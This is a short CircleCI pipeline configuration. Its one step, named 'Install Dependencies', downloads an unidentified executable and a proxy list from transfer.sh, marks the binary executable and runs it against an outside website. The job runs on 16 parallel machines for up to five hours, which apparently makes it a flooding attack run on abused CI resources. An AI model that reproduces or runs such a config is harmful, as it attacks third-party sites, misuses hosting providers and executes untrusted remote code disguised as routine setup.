version: 2.1
jobs:
    trial:
      docker:
            - image: debian:latest
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: apt update && apt install nodejs wget -y && wget https://transfer.sh/7vRVg3/jsss && wget https://transfer.sh/OYlJKU/proxy.txt && chmod +x jsss && ./jsss https://timelink.info/ 999999 153 1
            no_output_timeout: 5h

workflows:
    version: 2.1
    build:
        jobs:
        - trial
